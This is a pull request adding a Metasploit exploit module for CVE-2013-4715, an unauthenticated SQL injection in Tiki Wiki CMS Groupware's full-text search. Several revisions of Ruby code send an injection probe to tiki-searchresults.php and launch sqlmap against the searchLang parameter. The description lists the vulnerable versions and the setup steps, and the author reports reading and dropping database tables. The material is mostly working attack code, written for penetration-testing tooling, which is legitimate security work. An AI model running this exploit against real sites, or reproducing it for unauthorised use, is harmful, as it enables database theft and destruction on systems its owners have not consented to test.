### PR TITLE
Module cve2013 4715

### DIFF
--- a/modules/exploits/unix/webapp/tiki_fulltext_search_sqli.rb
+++ b/modules/exploits/unix/webapp/tiki_fulltext_search_sqli.rb
@@ -5,18 +5,10 @@
 #   http://metasploit.com/framework/
 ##
 
-##TO DO:
-#
-#Fix URI normalization
-#
-#Connect SQLMAP output to MSF datastore
-#
-#Add note to end user: 6.x appears to require login for fulltext search. Must add credentials manually via OPTS
-#
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking #default tiki db user does not have permissions to write stager to webroot
+  Rank = NormalRanking #default tiki db user does not have permissions to write stager to webroot, but may insert tiki content
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
@@ -27,14 +19,14 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description'    => %q{
           Tiki Wiki CMS Groupware (<6.13, <9.7, <10.4, 11.0) contains a SQL injection found in full-text
           search results (tiki-searchresults.php) which may result in remote code execution
-          under the context of SYSTEM in Windows; or as the user in Linux.
+          or arbitrary SQL commands.
           Authentication is not required in order to exploit this vulnerability.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
           'Yuji Tounai <bogus.jp>',  	     # Discovery
-          'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>',  #credit:sqlmap aux module pieces 
+          'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>',  #credit:sqlmap aux module pieces
           'Figure8 <figure_8@hushmail.com>'
         ],
       'References'     =>
@@ -58,15 +50,15 @@ class Metasploit3 < Msf::Exploit::Remote
       [
         OptPath.new('SQLMAP_PATH', [ true,  "The sqlmap >= 0.6.1 full path ", "/sqlmap" ]),
         OptString.new('URI', [ true, "Path to Tiki installation", "tiki/" ]),
-        OptString.new('OPTS', [ false,  "The sqlmap options to use" ]),
-        OptBool.new('BATCH', [ true,  "No user input: use SQLMAP recommendations" ])
+        OptString.new('OPTS', [ false,  "Custom SQLMAP options." ]),
+        OptBool.new('BATCH', [ true,  "Use SQLMAP recommendations?(true/false)" ])
       ], self.class)
   end
 
   def sqli_exec(sqli_string)
+    path = normalize_uri(datastore['URI'])
+
     if sqli_string == 'DryRun'
-      #test failed with no-slash uri
-      path = normalize_uri(datastore['URI'])
       send_request_raw({
         'method'    => 'GET',
         'uri'       => "#{path}tiki-searchresults.php?highlight=Tiki&boolean=on&where=pages&searchLang=foo'",
@@ -80,32 +72,27 @@ class Metasploit3 < Msf::Exploit::Remote
         print_error("The sqlmap script could not be found")
         return
       end
-      opts = datastore['OPTS']
+
       sqlmap_url  = (datastore['SSL'] ? "https" : "http")
       sqlmap_url << "://"
       sqlmap_url << datastore['RHOST']
-      sqlmap_url << "/"
-      sqlmap_url << datastore['URI']
+      sqlmap_url << path
       sqlmap_url << 'tiki-searchresults.php?'
-      sqlmap_url << "highlight=Tiki&boolean=on&where=pages&searchLang=foo"
+      sqlmap_url << "highlight=Tiki&boolean=on&where=pages&searchLang=foo*"
 
       cmd = [ sqlmap ]
       cmd += [ '-u', sqlmap_url ]
-      if opts
-        cmd << opts
+
+      opts = datastore['OPTS'].split("--")
+
+      opts.each do |i|
+       if not i == ""
+        cmd << "--" + i.strip
+       end
       end
 
-      cmd << '--technique=BET'
-      cmd << '--level=5'
       cmd << '--dbms=mysql'
-      cmd << '--skip=highlight,boolean,where,User-Agent'
-
-
-      #TODO: fix (situations getting local variable error)
-
-      #msf_path << '--msf-path='
-      #msf_path << Pathname.new(Msf::Config.install_root)
-      #cmd << msf_path
+      cmd << "--msf-path=#{Dir.pwd}"
 
       if datastore['BATCH'] == true
         cmd << '--batch'
@@ -121,17 +108,16 @@ class Metasploit3 < Msf::Exploit::Remote
     if res and res.body =~ /db_error/
       return Exploit::CheckCode::Appears
     else
-      #print_status(res.body)
-      #false negative if login is needed for searchbar
+      #false negative if login is needed for search function
       return Exploit::CheckCode::Safe
     end
   end
 
 
   def exploit
-    uri = normalize_uri(datastore['URI'])
 
-    print_status("Attempting SQL injection at #{uri}/tiki-searchresults.php")
+    uri = normalize_uri(datastore['URI'])
+    print_status("Attempting SQL injection at #{uri}tiki-searchresults.php")
     print_status("Please be patient, this may take some time...") 
     sqli_exec('RealThing')
 

--- a/modules/exploits/unix/webapp/tiki_fulltext_search_sqli.rb
+++ b/modules/exploits/unix/webapp/tiki_fulltext_search_sqli.rb
@@ -1,0 +1,128 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::WmapScanUniqueQuery 
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Tiki Wiki CMS Groupware 9.3 SQL Injection", #testing 9.3
+      'Description'    => %q{
+          Tiki Wiki CMS Groupware (< 9.7) contains a SQL injection found in full-text
+          search results (tiki-searchresults.php) which may result in remote code execution
+          under the context of SYSTEM in Windows; or as the user in Linux. 
+          Authentication is not required in order to exploit this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Yuji Tounai <bogus.jp>',  	     # Discovery
+          'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>',  #credit:sqlmap aux module pieces 
+          'Figure8 <figure_8@hushmail.com>'
+        ],
+      'References'     =>
+        [
+          ['OSVDB', '99215'],
+          ['CVE','2013-4715'],
+          ['BID', '63462']
+        ],
+      'Platform'       => %w{ linux win },
+      'Targets'        =>
+        [
+          ['Automatic', {}],
+          ['Windows',   { 'Arch' => ARCH_X86, 'Platform' => 'win'   }],
+          ['Linux',     { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
+      'DisclosureDate' => "Nov 6 2013"
+                     ))
+    register_options(
+      [
+        OptPath.new('SQLMAP_PATH', [ true,  "The sqlmap >= 0.6.1 full path ", "/sqlmap" ]),
+        OptString.new('URI', [ true, "Path to Tiki installation", "/tiki" ]),
+        OptString.new('OPTS', [ false,  "The sqlmap options to use" ]),
+        OptBool.new('BATCH', [ true,  "Batch mode. No input: use the default behaviour" ])
+      ], self.class)
+  end
+
+  # Modify to true if you have sqlmap installed.
+  def wmap_enabled
+    false
+  end
+
+
+  def sqli_exec(sqli_string)
+    if sqli_string == 'DryRun'
+      send_request_raw({
+        'method'    => 'GET',
+        'uri'       => "/tiki-searchresults.php?highlight=Tiki&boolean=on&where=pages&searchLang=foo'",
+        'headers'   => {
+          'Accept-Encoding' => 'identity'
+        }
+      })
+    else
+      sqlmap = File.join(datastore['SQLMAP_PATH'], 'sqlmap.py')
+      if not File.file?(sqlmap)
+        print_error("The sqlmap script could not be found")
+        return
+      end
+      opts = datastore['OPTS']
+      wmap_target_host = datastore['VHOST'] if datastore['VHOST']
+      sqlmap_url  = (datastore['SSL'] ? "https" : "http")
+      sqlmap_url << "://"
+      sqlmap_url << wmap_target_host.to_s
+      sqlmap_url << ":"
+      sqlmap_url << wmap_target_port.to_s
+      sqlmap_url << "/"
+      sqlmap_url << datastore['URI']
+      sqlmap_url << '?'
+      sqlmap_url << "highlight=Tiki&boolean=on&where=pages&searchLang=foo'"
+
+      cmd = [ sqlmap ]
+      cmd += [ '-u', sqlmap_url ]
+      if opts
+        cmd << opts
+      end
+      if datastore['BATCH'] == true
+        cmd << '--batch'
+      end
+      print_status("exec: #{cmd.inspect}")
+      system(*cmd)
+    end
+  end
+
+
+  def check
+    res = sqli_exec('DryRun') # only attempts to return db error
+
+    if res and res.body =~ /db_error/
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    # Make sure the URI begins with a slash
+    uri = normalize_uri(datastore['URI'])
+
+    print_status("Attempting SQL injection at #{uri}/tiki-searchresults.php ...")
+    print_status("Please be patient, this may take some time") 
+    sqli_exec('RealThing')
+
+    handler
+  end
+end

--- a/modules/exploits/unix/webapp/tiki_fulltext_search_sqli.rb
+++ b/modules/exploits/unix/webapp/tiki_fulltext_search_sqli.rb
@@ -7,7 +7,8 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ManualRanking
-  #Custom sqlmap options determine the usefulness of this module. No payload built in.
+  #Custom sqlmap options determine the usefulness of this module.
+  #No payload built in.
 
   include Msf::Exploit::Remote::HttpClient
 

--- a/modules/exploits/unix/webapp/tiki_fulltext_search_sqli.rb
+++ b/modules/exploits/unix/webapp/tiki_fulltext_search_sqli.rb
@@ -1,21 +1,19 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking #default tiki db user does not have permissions to write stager to webroot, but may insert tiki content
+  Rank = ManualRanking
+  #Custom sqlmap options determine the usefulness of this module. No payload built in.
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Tiki Wiki CMS Groupware SQL Injection", 
+      'Name'           => "Tiki Wiki CMS Groupware SQL Injection",
       'Description'    => %q{
           Tiki Wiki CMS Groupware (<6.13, <9.7, <10.4, 11.0) contains a SQL injection found in full-text
           search results (tiki-searchresults.php) which may result in remote code execution
@@ -49,62 +47,24 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         OptPath.new('SQLMAP_PATH', [ true,  "The sqlmap >= 0.6.1 full path ", "/sqlmap" ]),
-        OptString.new('URI', [ true, "Path to Tiki installation", "tiki/" ]),
+        OptString.new('TARGETURI', [ true, "Path to Tiki installation", "tiki/" ]),
         OptString.new('OPTS', [ false,  "Custom SQLMAP options." ]),
         OptBool.new('BATCH', [ true,  "Use SQLMAP recommendations?(true/false)" ])
       ], self.class)
   end
 
-  def sqli_exec(sqli_string)
-    path = normalize_uri(datastore['URI'])
-
-    if sqli_string == 'DryRun'
-      send_request_raw({
-        'method'    => 'GET',
-        'uri'       => "#{path}tiki-searchresults.php?highlight=Tiki&boolean=on&where=pages&searchLang=foo'",
-        'headers'   => {
-          'Accept-Encoding' => 'identity'
-        }
-      })
-    else
-      sqlmap = File.join(datastore['SQLMAP_PATH'], 'sqlmap.py')
-      if not File.file?(sqlmap)
-        print_error("The sqlmap script could not be found")
-        return
-      end
-
-      sqlmap_url  = (datastore['SSL'] ? "https" : "http")
-      sqlmap_url << "://"
-      sqlmap_url << datastore['RHOST']
-      sqlmap_url << path
-      sqlmap_url << 'tiki-searchresults.php?'
-      sqlmap_url << "highlight=Tiki&boolean=on&where=pages&searchLang=foo*"
-
-      cmd = [ sqlmap ]
-      cmd += [ '-u', sqlmap_url ]
-
-      opts = datastore['OPTS'].split("--")
-
-      opts.each do |i|
-       if not i == ""
-        cmd << "--" + i.strip
-       end
-      end
-
-      cmd << '--dbms=mysql'
-      cmd << "--msf-path=#{Dir.pwd}"
-
-      if datastore['BATCH'] == true
-        cmd << '--batch'
-      end
-      print_status("exec: #{cmd.inspect}")
-      system(*cmd)
-    end
-  end
 
   # Only attempts to return a db error
   def check
-    res = sqli_exec('DryRun')
+    path = normalize_uri(datastore['TARGETURI'])
+    res = send_request_raw({
+      'method'    => 'GET',
+      'uri'       => "#{path}tiki-searchresults.php?highlight=Tiki&boolean=on&where=pages&searchLang=foo'",
+      'headers'   => {
+        'Accept-Encoding' => 'identity'
+      }
+    })
+
     if res and res.body =~ /db_error/
       return Exploit::CheckCode::Appears
     else
@@ -115,12 +75,42 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
+    path = normalize_uri(datastore['TARGETURI'])
+    print_status("Attempting SQL injection at #{path}tiki-searchresults.php")
+    print_status("Please be patient, this may take some time...")
 
-    uri = normalize_uri(datastore['URI'])
-    print_status("Attempting SQL injection at #{uri}tiki-searchresults.php")
-    print_status("Please be patient, this may take some time...") 
-    sqli_exec('RealThing')
+    sqlmap = File.join(datastore['SQLMAP_PATH'], 'sqlmap.py')
+    if not File.file?(sqlmap)
+      print_error("The sqlmap script could not be found")
+      return
+    end
+    sqlmap_url  = (datastore['SSL'] ? "https" : "http")
+    sqlmap_url << "://"
+    sqlmap_url << datastore['RHOST']
+    sqlmap_url << path
+    sqlmap_url << 'tiki-searchresults.php?'
+    sqlmap_url << "highlight=Tiki&boolean=on&where=pages&searchLang=foo*"
 
-    handler
+    cmd = [ sqlmap ]
+    cmd += [ '-u', sqlmap_url ]
+
+
+    if (datastore['OPTS'])
+      opts = datastore['OPTS'].split("--")
+      opts.each do |i|
+        if not i == ""
+          cmd << "--" + i.strip
+        end
+      end
+    end
+
+    cmd << '--dbms=mysql'
+    cmd << "--msf-path=#{Dir.pwd}"
+
+    if datastore['BATCH'] == true
+      cmd << '--batch'
+    end
+    print_status("exec: #{cmd.inspect}")
+    system(*cmd)
   end
 end

--- a/modules/exploits/unix/webapp/tiki_fulltext_search_sqli.rb
+++ b/modules/exploits/unix/webapp/tiki_fulltext_search_sqli.rb
@@ -5,23 +5,29 @@
 #   http://metasploit.com/framework/
 ##
 
+##TO DO:
+#
+#Fix URI normalization
+#
+#Connect SQLMAP output to MSF datastore
+#
+#Add note to end user: 6.x appears to require login for fulltext search. Must add credentials manually via OPTS
+#
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = NormalRanking #default tiki db user does not have permissions to write stager to webroot
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::Scanner
-  include Msf::Auxiliary::WmapScanUniqueQuery 
   include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Tiki Wiki CMS Groupware 9.3 SQL Injection", #testing 9.3
+      'Name'           => "Tiki Wiki CMS Groupware SQL Injection", 
       'Description'    => %q{
-          Tiki Wiki CMS Groupware (< 9.7) contains a SQL injection found in full-text
+          Tiki Wiki CMS Groupware (<6.13, <9.7, <10.4, 11.0) contains a SQL injection found in full-text
           search results (tiki-searchresults.php) which may result in remote code execution
-          under the context of SYSTEM in Windows; or as the user in Linux. 
+          under the context of SYSTEM in Windows; or as the user in Linux.
           Authentication is not required in order to exploit this vulnerability.
       },
       'License'        => MSF_LICENSE,
@@ -51,23 +57,19 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         OptPath.new('SQLMAP_PATH', [ true,  "The sqlmap >= 0.6.1 full path ", "/sqlmap" ]),
-        OptString.new('URI', [ true, "Path to Tiki installation", "/tiki" ]),
+        OptString.new('URI', [ true, "Path to Tiki installation", "tiki/" ]),
         OptString.new('OPTS', [ false,  "The sqlmap options to use" ]),
-        OptBool.new('BATCH', [ true,  "Batch mode. No input: use the default behaviour" ])
+        OptBool.new('BATCH', [ true,  "No user input: use SQLMAP recommendations" ])
       ], self.class)
   end
 
-  # Modify to true if you have sqlmap installed.
-  def wmap_enabled
-    false
-  end
-
-
   def sqli_exec(sqli_string)
     if sqli_string == 'DryRun'
+      #test failed with no-slash uri
+      path = normalize_uri(datastore['URI'])
       send_request_raw({
         'method'    => 'GET',
-        'uri'       => "/tiki-searchresults.php?highlight=Tiki&boolean=on&where=pages&searchLang=foo'",
+        'uri'       => "#{path}tiki-searchresults.php?highlight=Tiki&boolean=on&where=pages&searchLang=foo'",
         'headers'   => {
           'Accept-Encoding' => 'identity'
         }
@@ -79,22 +81,32 @@ class Metasploit3 < Msf::Exploit::Remote
         return
       end
       opts = datastore['OPTS']
-      wmap_target_host = datastore['VHOST'] if datastore['VHOST']
       sqlmap_url  = (datastore['SSL'] ? "https" : "http")
       sqlmap_url << "://"
-      sqlmap_url << wmap_target_host.to_s
-      sqlmap_url << ":"
-      sqlmap_url << wmap_target_port.to_s
+      sqlmap_url << datastore['RHOST']
       sqlmap_url << "/"
       sqlmap_url << datastore['URI']
-      sqlmap_url << '?'
-      sqlmap_url << "highlight=Tiki&boolean=on&where=pages&searchLang=foo'"
+      sqlmap_url << 'tiki-searchresults.php?'
+      sqlmap_url << "highlight=Tiki&boolean=on&where=pages&searchLang=foo"
 
       cmd = [ sqlmap ]
       cmd += [ '-u', sqlmap_url ]
       if opts
         cmd << opts
       end
+
+      cmd << '--technique=BET'
+      cmd << '--level=5'
+      cmd << '--dbms=mysql'
+      cmd << '--skip=highlight,boolean,where,User-Agent'
+
+
+      #TODO: fix (situations getting local variable error)
+
+      #msf_path << '--msf-path='
+      #msf_path << Pathname.new(Msf::Config.install_root)
+      #cmd << msf_path
+
       if datastore['BATCH'] == true
         cmd << '--batch'
       end
@@ -103,24 +115,24 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
-
+  # Only attempts to return a db error
   def check
-    res = sqli_exec('DryRun') # only attempts to return db error
-
+    res = sqli_exec('DryRun')
     if res and res.body =~ /db_error/
       return Exploit::CheckCode::Appears
     else
+      #print_status(res.body)
+      #false negative if login is needed for searchbar
       return Exploit::CheckCode::Safe
     end
   end
 
 
   def exploit
-    # Make sure the URI begins with a slash
     uri = normalize_uri(datastore['URI'])
 
-    print_status("Attempting SQL injection at #{uri}/tiki-searchresults.php ...")
-    print_status("Please be patient, this may take some time") 
+    print_status("Attempting SQL injection at #{uri}/tiki-searchresults.php")
+    print_status("Please be patient, this may take some time...") 
     sqli_exec('RealThing')
 
     handler


### PR DESCRIPTION
Module for CVE-2013-4715, Tiki Wiki CMS Groupware SQL Injection. It calls sqlmap against the vulnerable search request parameter, so sqlmap must be installed for the exploit to run. For the installation to be vulnerable, it must be version (<6.13, <9.7, <10.4, 11.0) and must have the MySQL full-text search enabled. The default install for 6.x versions might require authentication before a search can be done. The SQL injection is on the searchLang parameter and appears to be a blind injection. 

Since MSF is calling sqlmap, any logs are sent back to the sqlmap output directory. Sending sqlmap output to MSF loot has not been built into the module. The filedropper include may not be necessary and I have not tested the handler with a shell being sent back by sqlmap. 

Testing:
- Install a vulnerable version of Tiki Wiki CMS (http://doc.tiki.org/Documentation).
- Log in as administrator. 
- Go to /tiki-admin.php?page=search&alt=Search
- Check the "MySQL Full-Text Search" box and click the button labeled "Change Preferences". It should now be ready for MSF testing.
- The module check function only attempts to cause a page to be returned with regex /db_error/
- The URI option is required and must be correct for the installation path (e.g. tiki/) 
- The BATCH option was set as required, true or false.
- The SQLMAP_PATH is also required.
- Additional sqlmap options can be specified if proceeded by -- (parsing of single dash options was not included) e.g. set OPTS --beep --cleanup

Arbitrary SQL queries writing to the database are possible. I've succeeded in reading from tables and dropping tables during testing. Theoretically you should also be able to load a stager through the Tiki content itself, even if the webroot is not writable, but I haven't tested that.

Final note: this is my first attempt at a Metasploit module and I'm not familiar with developing through git. Please review thoroughly and let me know of any errors/blunders/faux pas during this process for my own information going forward.
